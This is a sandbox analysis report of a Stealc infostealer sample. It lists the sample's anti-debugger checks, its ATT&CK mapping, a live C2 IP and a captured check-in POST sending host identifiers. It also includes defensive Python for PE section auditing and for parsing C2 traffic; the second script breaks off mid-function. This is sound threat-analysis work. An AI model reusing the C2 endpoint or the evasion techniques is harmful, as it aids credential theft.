              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26052
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25897
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26044
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25917
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25941
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformation
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformation

              Anti Debugging

              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebugger
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00304A60 VirtualProtect 00000000,00000004,00000100,?0_2_00304A60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00326390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00326390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00326390 mov eax, dword ptr fs:[00000030h]0_2_00326390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00322A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00322A40
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeMemory protected: page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: Yara matchFile source: Process Memory Space: file.exe PID: 3012, type: MEMORYSTR
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00324610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,0_2_00324610
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003246A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_003246A0
              Source: file.exe, file.exe, 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
              Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00322D60
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00321B20 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00321B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00322A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00322A40
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00322C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00322C10

              Stealing of Sensitive Information

              Source: Yara matchFile source: 00000000.00000003.2046460649.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2087381883.000000000100E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 3012, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Remote Access Functionality

              Source: Yara matchFile source: 00000000.00000003.2046460649.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2087381883.000000000100E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 3012, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP
              MITRE ATT&CK Matrix (a number in front of a technique is the count of signatures matched for it)

              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
              Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
              Execution: 2 Command and Scripting Interpreter; 13 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
              Persistence: 1 Create Account; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
              Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
              Defense Evasion: 1 Masquerading; 33 Virtualization/Sandbox Evasion; 11 Disable or Modify Tools; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
              Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
              Discovery: 2 System Time Discovery; 641 Security Software Discovery; 33 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 1 File and Directory Discovery; 324 System Information Discovery
              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
              Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
              Command and Control: 2 Encrypted Channel; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
              Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
              Source | Detection | Scanner | Label
              file.exe | 100% | Avira | TR/Crypt.TPM.Gen
              file.exe | 100% | Joe Sandbox ML |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No contacted domains info
              Name | Malicious | Antivirus Detection | Reputation
              http://185.215.113.206/c4becf79229cb002.php | false | | high
              http://185.215.113.206/ | false | | high
              185.215.113.206/c4becf79229cb002.php | false | | high
              Name | Source | Malicious | Antivirus Detection | Reputation
              http://185.215.113.206/c4becf79229cb002.phpK | file.exe, 00000000.00000002.2087381883.0000000001066000.00000004.00000020.00020000.00000000.sdmp | false | | high
              http://185.215.113.206/c4becf79229cb002.php) | file.exe, 00000000.00000002.2087381883.000000000106F000.00000004.00000020.00020000.00000000.sdmp | false | | high
              http://185.215.113.206/c4becf79229cb002.php/ | file.exe, 00000000.00000002.2087381883.000000000106F000.00000004.00000020.00020000.00000000.sdmp | false | | high
              http://185.215.113.206 | file.exe, 00000000.00000002.2087381883.000000000100E000.00000004.00000020.00020000.00000000.sdmp | false | | high
              http://185.215.113.206/c4becf79229cb002.phpD | file.exe, 00000000.00000002.2087381883.000000000106F000.00000004.00000020.00020000.00000000.sdmp | false | | high
              http://185.215.113.206/c4becf79229cb002.phpg | file.exe, 00000000.00000002.2087381883.0000000001066000.00000004.00000020.00020000.00000000.sdmp | false | | high
              IP | Domain | Country | ASN | ASN Name | Malicious
              185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1561849
                                Start date and time:2024-11-24 13:38:05 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 3m 0s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:2
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:file.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@1/0@0/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 80%
                                • Number of executed functions: 19
                                • Number of non-executed functions: 119
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Stop behavior analysis, all processes terminated
                                • Exclude process from analysis (whitelisted): dllhost.exe
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • VT rate limit hit for: file.exe
                                No simulations
              Match | Associated Sample Name / URL | Detection | Threat Name | Context
              185.215.113.206 | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206/c4becf79229cb002.php
              185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
              185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
              185.215.113.206 | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
              185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
              185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
              185.215.113.206 | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206/c4becf79229cb002.php
              185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
              185.215.113.206 | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, JasonRAT, LummaC Stealer, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
              185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
                                No context
              Match | Associated Sample Name / URL | Detection | Threat Name | Context
              WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206
              WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
              WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC Stealer | 185.215.113.16
              WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
              WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 185.215.113.206
              WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC Stealer | 185.215.113.16
              WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
              WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
              WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC Stealer | 185.215.113.16
              WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206
                                No context
                                No context
                                No created / dropped files found
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.945718583925588
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:file.exe
                                File size:1'801'728 bytes
                                MD5:5ef73b409c0a81b7d80cce15a2e83ad9
                                SHA1:6ddd5bf03db3c5402469a7f3f443f27f2566ba3b
                                SHA256:005bb039d2c317340f5e0d3177d85559ccb63c3a722058833d824635069c4c4a
                                SHA512:188948d037cb8e875ef35d07783dfb485e8a88d2d5e3ceda4cb38d1ee2a7e37a21b5036faad12fb3a63cb10667b0c0caa2d0b04d2a5de25a0fc38ce05ee73a79
                                SSDEEP:24576:2y8p41cCNb6lw0TEGTZ7rAP7GzOEzlYXeEUA/sCoLkxcln5rwrl3chMd8sNq9YX8:2Q1cI64GTZ7cTGznBaeBaxU5Gci1fiP
                                TLSH:338533D31F434D22E54C0977A4ADE3990BFEC5186299CF63E1AA6D72D826BB015F2073
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..
                                Icon Hash:00928e8e8686b000
                                Entrypoint:0xa93000
                                Entrypoint Section:.taggant
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:1
                                File Version Major:5
                                File Version Minor:1
                                Subsystem Version Major:5
                                Subsystem Version Minor:1
                                Import Hash:2eabe9054cad5152567f0699947a2c5b
                                Instruction
                                jmp 00007FCE888F74BAh
                                subps xmm3, dqword ptr [ebx]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add cl, ch
                                add byte ptr [eax], ah
                                add byte ptr [eax], al
                                add byte ptr [0000000Ah], al
                                add byte ptr [eax], al
                                add byte ptr [eax+75h], ah
                                xchg eax, esi
                                push cs
                                mov ah, 90h
                                xchg eax, esi
                                sldt word ptr [eax]
                                add byte ptr [eax], al
                                Disassembly preview: the listed bytes decode almost entirely as `add byte ptr [eax], al` (runs of zero bytes), broken only by `add eax, 0000000Ah` (twice), `add byte ptr [esi], al`, `add byte ptr [eax], 00000000h` and `adc byte ptr [eax], al`. No meaningful code is recoverable from this listing; the region is data that the unpacking stub fills in at runtime.
                                Programming Language:
                                • [C++] VS2010 build 30319
                                • [ASM] VS2010 build 30319
                                • [ C ] VS2010 build 30319
                                • [ C ] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729
                                • [LNK] VS2010 build 30319
                                Name                                  Virtual Address  Virtual Size  Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT          0x24b04d         0x61          .idata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE        0x24a000         0x2b0         .rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC       0x24b1f8         0x8           .idata
                                IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                Name                 Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type             Entropy
                                (name not rendered)  0x1000           0x249000      0x16200   5eb2b536b0ecb29a7ce8284c609515c4  unknown   unknown              unknown               unknown
                                .rsrc                0x24a000         0x2b0         0x200     f502cb5fbeb4533addc947a9e49625f8  False     0.798828125          data                  6.016924945463094
                                .idata               0x24b000         0x1000        0x200     0d0399d83a742d5d86c5718841e8e842  False     0.134765625          data                  0.8646718654202081
                                (name not rendered)  0x24c000         0x2a8000      0x200     68ec52a2e8d66b0e87968f8ea09dc0cc  unknown   unknown              unknown               unknown
                                jerbjqqv             0x4f4000         0x19e000      0x19e000  2d3da8c18befff84ed9b21c0048c8358  False     0.9945139124773551   data                  7.954382672261457
                                nuqdewfy             0x692000         0x1000        0x400     f97370d004f0b84d663b3f86920ab09b  False     0.7841796875         data                  6.070651437030384
                                .taggant             0x693000         0x3000        0x2200    f2a080261cca9440aafb375f1f551c48  False     0.06675091911764706  DOS executable (COM)  0.7724518532527349

                                Characteristics:
                                • both unnamed sections, jerbjqqv, nuqdewfy, .taggant: IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                • .rsrc, .idata: IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                Three traits of this table matter for triage: five of the seven sections are readable, writable and executable at once; two sections have no name the report can render; and the payload sits in jerbjqqv, whose 0x19e000 bytes of file data have an entropy of 7.95, close to the 8.0 ceiling of encrypted or compressed data. The first section, by contrast, maps 0x249000 bytes of virtual space onto only 0x16200 bytes of file data, which is the room the stub needs to unpack the real image in place.
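                                The following Python script is an added example, not Joe Sandbox code and not part of this report. It reads the section table straight from the PE headers with struct, computes per-section Shannon entropy and flags the four traits visible in the table above (RWX sections, unprintable names, near-8.0 entropy, virtual size far beyond raw size). It runs on a two-section PE32 skeleton constructed inside the script rather than on the analysed sample; the thresholds ENTROPY_LIMIT and VSIZE_RATIO are the example author's assumptions, not values taken from the report.

```python
import math
import struct

# IMAGE_SECTION_HEADER characteristic bits (winnt.h)
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

SECTION_HDR = struct.Struct("<8sIIIIIIHHI")  # 40-byte IMAGE_SECTION_HEADER

# Assumed thresholds (example author's choice, not values from the report)
ENTROPY_LIMIT = 7.0   # bits/byte; packed or encrypted data sits near 8.0
VSIZE_RATIO = 4       # virtual size this many times raw size = room to unpack


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 for constant data, 8.0 for uniform data)."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes):
    """Yield one dict per section: MZ -> e_lfanew -> PE signature -> COFF header -> section table."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    _, nsect, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", pe, coff)
    table = coff + 20 + opt_size  # section headers follow the optional header
    for i in range(nsect):
        (name, vsize, va, rawsize, rawptr,
         _, _, _, _, chars) = SECTION_HDR.unpack_from(pe, table + i * SECTION_HDR.size)
        raw = pe[rawptr:rawptr + rawsize] if rawsize else b""
        yield {"name": name.rstrip(b"\0"), "va": va, "vsize": vsize,
               "rawsize": rawsize, "chars": chars, "entropy": shannon_entropy(raw)}


def audit_sections(pe: bytes):
    """Return (section label, finding) pairs for packer-style section layouts."""
    findings = []
    for s in parse_sections(pe):
        label = s["name"].decode("ascii", "replace") or "(unnamed)"
        if s["chars"] & IMAGE_SCN_MEM_EXECUTE and s["chars"] & IMAGE_SCN_MEM_WRITE:
            findings.append((label, "RWX section"))
        if not s["name"] or any(b < 0x20 or b > 0x7E for b in s["name"]):
            findings.append((label, "empty or unprintable section name"))
        if s["rawsize"] and s["entropy"] > ENTROPY_LIMIT:
            findings.append((label, "high entropy raw data (%.2f bits/byte)" % s["entropy"]))
        if s["vsize"] > VSIZE_RATIO * max(s["rawsize"], 1):
            findings.append((label, "virtual size far exceeds raw size"))
    return findings


def build_demo_pe() -> bytes:
    """Constructed two-section PE32 skeleton for the demo (not the analysed sample)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                 # e_lfanew
    opt = bytearray(0xE0)                                 # PE32 optional header, zeroed
    struct.pack_into("<H", opt, 0, 0x10B)                 # Magic = PE32
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, len(opt), 0x0102)
    text_ptr, text_raw = 0x200, b"\x90" * 0x200           # NOP sled: entropy 0.0
    pack_ptr, pack_raw = 0x400, bytes(range(256)) * 4     # every byte value x4: entropy 8.0
    headers = SECTION_HDR.pack(b".text\0\0\0", 0x200, 0x1000, len(text_raw), text_ptr, 0, 0, 0, 0,
                               IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
    headers += SECTION_HDR.pack(b"\x01\x02\x03\0\0\0\0\0", 0x20000, 0x2000, len(pack_raw), pack_ptr,
                                0, 0, 0, 0,
                                IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_EXECUTE
                                | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)
    image = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + headers
    image += b"\0" * (text_ptr - len(image)) + text_raw
    image += b"\0" * (pack_ptr - len(image)) + pack_raw
    return image


if __name__ == "__main__":
    for label, finding in audit_sections(build_demo_pe()):
        print("%-10r %s" % (label, finding))
```

                                Run against a real file, replace build_demo_pe() with the file's bytes; the .text section of the skeleton produces no finding, while the constructed RWX section trips all four checks.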
                                Name         RVA       Size   Type                                    Language  Country  ZLIB Complexity
                                RT_MANIFEST  0x691c08  0x256  ASCII text, with CRLF line terminators  -         -        0.5100334448160535
                                DLL           Import
                                kernel32.dll  lstrcpy

                                lstrcpy is the only statically imported function; every other API the sample uses is resolved at runtime (see the LoadLibraryA / GetProcAddress chain in the execution graph below).
                                Timestamp                         SID      Signature                                         Severity  Source IP    Source Port  Dest IP          Dest Port  Protocol
                                2024-11-24T13:39:01.001087+0100   2044243  ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in   1         192.168.2.5  49704        185.215.113.206  80         TCP
                                Timestamp                            Source Port  Dest Port  Source IP        Dest IP
                                Nov 24, 2024 13:38:58.943334103 CET  49704        80         192.168.2.5      185.215.113.206
                                Nov 24, 2024 13:38:59.063163042 CET  80           49704      185.215.113.206  192.168.2.5
                                Nov 24, 2024 13:38:59.063276052 CET  49704        80         192.168.2.5      185.215.113.206
                                Nov 24, 2024 13:38:59.066936970 CET  49704        80         192.168.2.5      185.215.113.206
                                Nov 24, 2024 13:38:59.186464071 CET  80           49704      185.215.113.206  192.168.2.5
                                Nov 24, 2024 13:39:00.520813942 CET  80           49704      185.215.113.206  192.168.2.5
                                Nov 24, 2024 13:39:00.520917892 CET  49704        80         192.168.2.5      185.215.113.206
                                Nov 24, 2024 13:39:00.524223089 CET  49704        80         192.168.2.5      185.215.113.206
                                Nov 24, 2024 13:39:00.643878937 CET  80           49704      185.215.113.206  192.168.2.5
                                Nov 24, 2024 13:39:01.001008987 CET  80           49704      185.215.113.206  192.168.2.5
                                Nov 24, 2024 13:39:01.001086950 CET  49704        80         192.168.2.5      185.215.113.206
                                Nov 24, 2024 13:39:02.759378910 CET  49704        80         192.168.2.5      185.215.113.206
                                • 185.215.113.206
                                Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                0           192.168.2.5  49704        185.215.113.206  80                3012  C:\Users\user\Desktop\file.exe
                                Timestamp                            Bytes transferred  Direction  Data
                                Nov 24, 2024 13:38:59.066936970 CET  90                 OUT
                                    GET / HTTP/1.1
                                    Host: 185.215.113.206
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache

                                Nov 24, 2024 13:39:00.520813942 CET  203                IN
                                    HTTP/1.1 200 OK
                                    Date: Sun, 24 Nov 2024 12:39:00 GMT
                                    Server: Apache/2.4.41 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                    Content-Type: text/html; charset=UTF-8

                                Nov 24, 2024 13:39:00.524223089 CET  413                OUT
                                    POST /c4becf79229cb002.php HTTP/1.1
                                    Content-Type: multipart/form-data; boundary=----GDBKJDGIJECFIEBFIDHC
                                    Host: 185.215.113.206
                                    Content-Length: 211
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Data Raw: 2d 2d 2d 2d 2d 2d 47 44 42 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 32 38 34 38 44 46 41 39 34 34 32 34 30 39 36 35 37 32 39 32 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 2d 2d 0d 0a
                                    Data Ascii:
                                    ------GDBKJDGIJECFIEBFIDHC
                                    Content-Disposition: form-data; name="hwid"

                                    972848DFA9442409657292
                                    ------GDBKJDGIJECFIEBFIDHC
                                    Content-Disposition: form-data; name="build"

                                    mars
                                    ------GDBKJDGIJECFIEBFIDHC--

                                Nov 24, 2024 13:39:01.001008987 CET  210                IN
                                    HTTP/1.1 200 OK
                                    Date: Sun, 24 Nov 2024 12:39:00 GMT
                                    Server: Apache/2.4.41 (Ubuntu)
                                    Content-Length: 8
                                    Keep-Alive: timeout=5, max=99
                                    Connection: Keep-Alive
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 59 6d 78 76 59 32 73 3d
                                    Data Ascii: YmxvY2s=

                                The check-in POST carries two form fields, hwid (972848DFA9442409657292) and build (the build tag "mars"). The 8-byte reply YmxvY2s= is base64 for the string "block": the server accepted the request but answered with that token rather than a task or configuration, and no further request follows in this session.
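                                The script below is an added example, not code from this report and not the Emerging Threats rule 2044243 that fired on this traffic. It parses a raw HTTP request, splits the multipart body into named fields, applies a simple check-in heuristic and decodes the base64 reply. The request and response bytes are reconstructed from the capture above; the heuristic in is_stealc_checkin (a POST to a .php target whose multipart body carries exactly the fields hwid and build) is the example author's own and makes no claim about the logic of the ET signature.

```python
import base64
import re

# Form fields seen in the first POST of the capture
CHECKIN_FIELDS = {"hwid", "build"}


def parse_http_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, target, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, target, _version = lines[0].split(b" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(b":")
        headers[key.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return method.decode("latin-1"), target.decode("latin-1"), headers, body


def parse_multipart(body: bytes, content_type: str) -> dict:
    """Return {field name: value} for a multipart/form-data body (text parts only)."""
    match = re.search(r'boundary="?([^";]+)"?', content_type)
    if not match:
        raise ValueError("no multipart boundary in Content-Type")
    delimiter = b"--" + match.group(1).encode("latin-1")
    fields = {}
    for part in body.split(delimiter):
        part = part.strip(b"\r\n")
        if not part or part == b"--":  # preamble or the closing "--" marker
            continue
        part_head, _, value = part.partition(b"\r\n\r\n")
        name = re.search(rb'name="([^"]*)"', part_head)
        if name:
            fields[name.group(1).decode("latin-1")] = value.decode("latin-1")
    return fields


def is_stealc_checkin(raw_request: bytes) -> bool:
    """Heuristic (assumption): POST to a .php target with exactly hwid and build fields."""
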